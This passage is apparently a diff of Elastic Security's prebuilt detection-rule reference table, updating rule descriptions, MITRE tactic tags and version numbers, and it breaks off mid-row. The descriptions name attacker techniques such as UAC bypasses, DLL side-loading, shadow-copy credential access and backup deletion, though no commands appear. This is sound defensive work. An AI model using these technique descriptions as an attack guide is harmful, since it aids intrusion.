[Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-werfault-child-process, Suspicious WerFault Child Process>> |A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-zoom-child-process, Suspicious Zoom Child Process>> |A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-windows-process-cluster-spawned-by-a-host, Suspicious Windows Process Cluster Spawned by a Host>> |A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<suspicious-windows-process-cluster-spawned-by-a-parent-process, Suspicious Windows Process Cluster Spawned by a Parent Process>> |A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<suspicious-windows-process-cluster-spawned-by-a-user, Suspicious Windows Process Cluster Spawned by a User>> |A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<suspicious-zoom-child-process, Suspicious Zoom Child Process>> |A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<suspicious-macos-ms-office-child-process, Suspicious macOS MS Office Child Process>> |Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, and Excel). These child processes are often launched during exploitation of Office applications or by documents with malicious macros. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-which-enumeration, Suspicious which Enumeration>> |This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<suspicious-which-enumeration, Suspicious which Enumeration>> |This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<svchost-spawning-cmd, Svchost spawning Cmd>> |Identifies a suspicious parent child process relationship with cmd.exe descending from svchost.exe |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |207 -|<<symbolic-link-to-shadow-copy-created, Symbolic Link to Shadow Copy Created>> |Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<symbolic-link-to-shadow-copy-created, Symbolic Link to Shadow Copy Created>> |Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<system-binary-copied-and-or-moved-to-suspicious-directory, System Binary Copied and/or Moved to Suspicious Directory>> |This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |1 +|<<system-binary-copied-and-or-moved-to-suspicious-directory, System Binary Copied and/or Moved to Suspicious Directory>> |This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |2 |<<system-hosts-file-access, System Hosts File Access>> |Identifies the use of built-in tools to read the contents of \etc\hosts on a local machine. Attackers may use this data to discover remote machines in an environment that may be used for Lateral Movement from the current system. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 |<<system-information-discovery-via-windows-command-shell, System Information Discovery via Windows Command Shell>> |Identifies the execution of discovery commands to enumerate system information, files, and folders using the Windows Command Shell. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |7 -|<<system-log-file-deletion, System Log File Deletion>> |Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<system-log-file-deletion, System Log File Deletion>> |Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<system-network-connections-discovery, System Network Connections Discovery>> |Adversaries may attempt to get a listing of network connections to or from a compromised system. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 @@ -1698,7 +1766,7 @@ and their rule type is `machine_learning`. |<<system-service-discovery-through-built-in-windows-utilities, System Service Discovery through built-in Windows Utilities>> |Detects the usage of commonly used system service discovery techniques, which attackers may use during the reconnaissance phase after compromising a system in order to gain a better understanding of the environment and/or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |5 -|<<system-shells-via-services, System Shells via Services>> |Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<system-shells-via-services, System Shells via Services>> |Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<system-time-discovery, System Time Discovery>> |Detects the usage of commonly used system time discovery techniques, which attackers may use during the reconnaissance phase after compromising a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |5 @@ -1706,11 +1774,13 @@ and their rule type is `machine_learning`. |<<tcc-bypass-via-mounted-apfs-snapshot-access, TCC Bypass via Mounted APFS Snapshot Access>> |Identifies the use of the mount_apfs command to mount the entire file system through Apple File System (APFS) snapshots as read-only and with the noowners flag set. This action enables the adversary to access almost any file in the file system, including all user data and files protected by Apple’s privacy framework (TCC). |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 +|<<tainted-kernel-module-load, Tainted Kernel Module Load>> |This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |1 + |<<tampering-of-bash-command-line-history, Tampering of Bash Command-Line History>> |Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |103 -|<<temporarily-scheduled-task-creation, Temporarily Scheduled Task Creation>> |Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |6 +|<<temporarily-scheduled-task-creation, Temporarily Scheduled Task Creation>> |Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution] |8.3.0 |7 -|<<third-party-backup-files-deleted-via-unexpected-process, Third-party Backup Files Deleted via Unexpected Process>> |Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<third-party-backup-files-deleted-via-unexpected-process, Third-party Backup Files Deleted via Unexpected Process>> |Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<threat-intel-hash-indicator-match, Threat Intel Hash Indicator Match>> |This rule is triggered when a hash indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains file hashes, such as antivirus alerts, process creation, library load, and file operation events. |[OS: Windows], [Data Source: Elastic Endgame], [Rule Type: Indicator Match] |8.5.0 |4 @@ -1724,45 +1794,49 @@ and their rule type is `machine_learning`. |<<trap-signals-execution, Trap Signals Execution>> |Identify activity related where adversaries can include a trap command which then allows programs and shells to specify commands that will be executed upon receiving interrupt signals. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer, UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer>> |Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer, UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer>> |Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-attempt-via-privileged-ifileoperation-com-interface, UAC Bypass Attempt via Privileged IFileOperation COM Interface>> |Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-attempt-via-privileged-ifileoperation-com-interface, UAC Bypass Attempt via Privileged IFileOperation COM Interface>> |Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-attempt-via-windows-directory-masquerading, UAC Bypass Attempt via Windows Directory Masquerading>> |Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<uac-bypass-attempt-via-windows-directory-masquerading, UAC Bypass Attempt via Windows Directory Masquerading>> |Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface, UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface>> |Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface, UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface>> |Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-via-diskcleanup-scheduled-task-hijack, UAC Bypass via DiskCleanup Scheduled Task Hijack>> |Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<uac-bypass-via-diskcleanup-scheduled-task-hijack, UAC Bypass via DiskCleanup Scheduled Task Hijack>> |Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<uac-bypass-via-icmluautil-elevated-com-interface, UAC Bypass via ICMLuaUtil Elevated COM Interface>> |Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-via-icmluautil-elevated-com-interface, UAC Bypass via ICMLuaUtil Elevated COM Interface>> |Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-via-windows-firewall-snap-in-hijack, UAC Bypass via Windows Firewall Snap-In Hijack>> |Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<uac-bypass-via-windows-firewall-snap-in-hijack, UAC Bypass via Windows Firewall Snap-In Hijack>> |Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<unauthorized-access-to-an-okta-application, Unauthorized Access to an Okta Application>> |Identifies unauthorized access attempts to Okta applications. |[Tactic: Initial Access], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<unauthorized-access-to-an-okta-application, Unauthorized Access to an Okta Application>> |Identifies unauthorized access attempts to Okta applications. |[Tactic: Initial Access], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 |<<uncommon-registry-persistence-change, Uncommon Registry Persistence Change>> |Detects changes to registry persistence keys that are not commonly used or modified by legitimate programs. This could be an indication of an adversary's attempt to persist in a stealthy manner. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |105 |<<unexpected-child-process-of-macos-screensaver-engine, Unexpected Child Process of macOS Screensaver Engine>> |Identifies when a child process is spawned by the screensaver engine process, which is consistent with an attacker's malicious payload being executed after the screensaver activated on the endpoint. An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<unsigned-dll-loaded-by-svchost, Unsigned DLL Loaded by Svchost>> |Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.4.0 |4 +|<<unix-socket-connection, Unix Socket Connection>> |This rule monitors for inter-process communication via Unix sockets. Adversaries may attempt to communicate with local Unix sockets to enumerate application details, find vulnerabilities/configuration mistakes and potentially escalate privileges or set up malicious communication channels via Unix sockets for inter-process communication to attempt to evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 + +|<<unsigned-bits-service-client-process, Unsigned BITS Service Client Process>> |Identifies an unsigned Windows Background Intelligent Transfer Service (BITS) client process. Attackers may abuse BITS functionality to download or upload data using the BITS service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + +|<<unsigned-dll-loaded-by-svchost, Unsigned DLL Loaded by Svchost>> |Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.4.0 |5 -|<<unsigned-dll-loaded-by-a-trusted-process, Unsigned DLL Loaded by a Trusted Process>> |Identifies digitally signed (trusted) processes loading unsigned DLLs. Attackers may plant their payloads into the application folder and invoke the legitimate application to execute the payload, masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 +|<<unsigned-dll-loaded-by-a-trusted-process, Unsigned DLL Loaded by a Trusted Process>> |Identifies digitally signed (trusted) processes loading unsigned DLLs. Attackers may plant their payloads into the application folder and invoke the legitimate application to execute the payload, masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.4.0 |101 -|<<unsigned-dll-side-loading-from-a-suspicious-folder, Unsigned DLL Side-Loading from a Suspicious Folder>> |Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.4.0 |4 +|<<unsigned-dll-side-loading-from-a-suspicious-folder, Unsigned DLL Side-Loading from a Suspicious Folder>> |Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.4.0 |5 -|<<untrusted-driver-loaded, Untrusted Driver Loaded>> |Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 +|<<untrusted-driver-loaded, Untrusted Driver Loaded>> |Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 -|<<unusual-aws-command-for-a-user, Unusual AWS Command for a User>> |A machine learning job detected an AWS API command that, while not inherently suspicious or abnormal, is being made by a user context that does not normally use the command. This can be the result of compromised credentials or keys as someone uses a valid account to persist, move laterally, or exfiltrate data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<unusual-aws-command-for-a-user, Unusual AWS Command for a User>> |A machine learning job detected an AWS API command that, while not inherently suspicious or abnormal, is being made by a user context that does not normally use the command. This can be the result of compromised credentials or keys as someone uses a valid account to persist, move laterally, or exfiltrate data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 |<<unusual-child-process-from-a-system-virtual-process, Unusual Child Process from a System Virtual Process>> |Identifies a suspicious child process of the Windows virtual system process, which could indicate code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<unusual-child-process-of-dns-exe, Unusual Child Process of dns.exe>> |Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |106 +|<<unusual-child-process-of-dns-exe, Unusual Child Process of dns.exe>> |Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |107 |<<unusual-child-processes-of-rundll32, Unusual Child Processes of RunDLL32>> |Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 -|<<unusual-city-for-an-aws-command, Unusual City For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<unusual-city-for-an-aws-command, Unusual City For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 -|<<unusual-country-for-an-aws-command, Unusual Country For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (country) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<unusual-country-for-an-aws-command, Unusual Country For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (country) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 |<<unusual-dns-activity, Unusual DNS Activity>> |A machine learning job detected a rare and unusual DNS query that indicate network activity with unusual DNS domains. This can be due to initial access, persistence, command-and-control, or exfiltration activity. For example, when a user clicks on a link in a phishing email or opens a malicious document, a request may be sent to download and run a payload from an uncommon domain. When malware is already running, it may send requests to an uncommon DNS domain the malware uses for command-and-control communication. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.3.0 |103 @@ -1772,11 +1846,11 @@ and their rule type is `machine_learning`. |<<unusual-discovery-signal-alert-with-unusual-process-executable, Unusual Discovery Signal Alert with Unusual Process Executable>> |This rule leverages alert data from various Discovery building block rules to alert on signals with unusual unique host.id, user.id and process.executable entries. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: Higher-Order Rule] |8.6.0 |1 -|<<unusual-executable-file-creation-by-a-system-critical-process, Unusual Executable File Creation by a System Critical Process>> |Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<unusual-executable-file-creation-by-a-system-critical-process, Unusual Executable File Creation by a System Critical Process>> |Identifies an 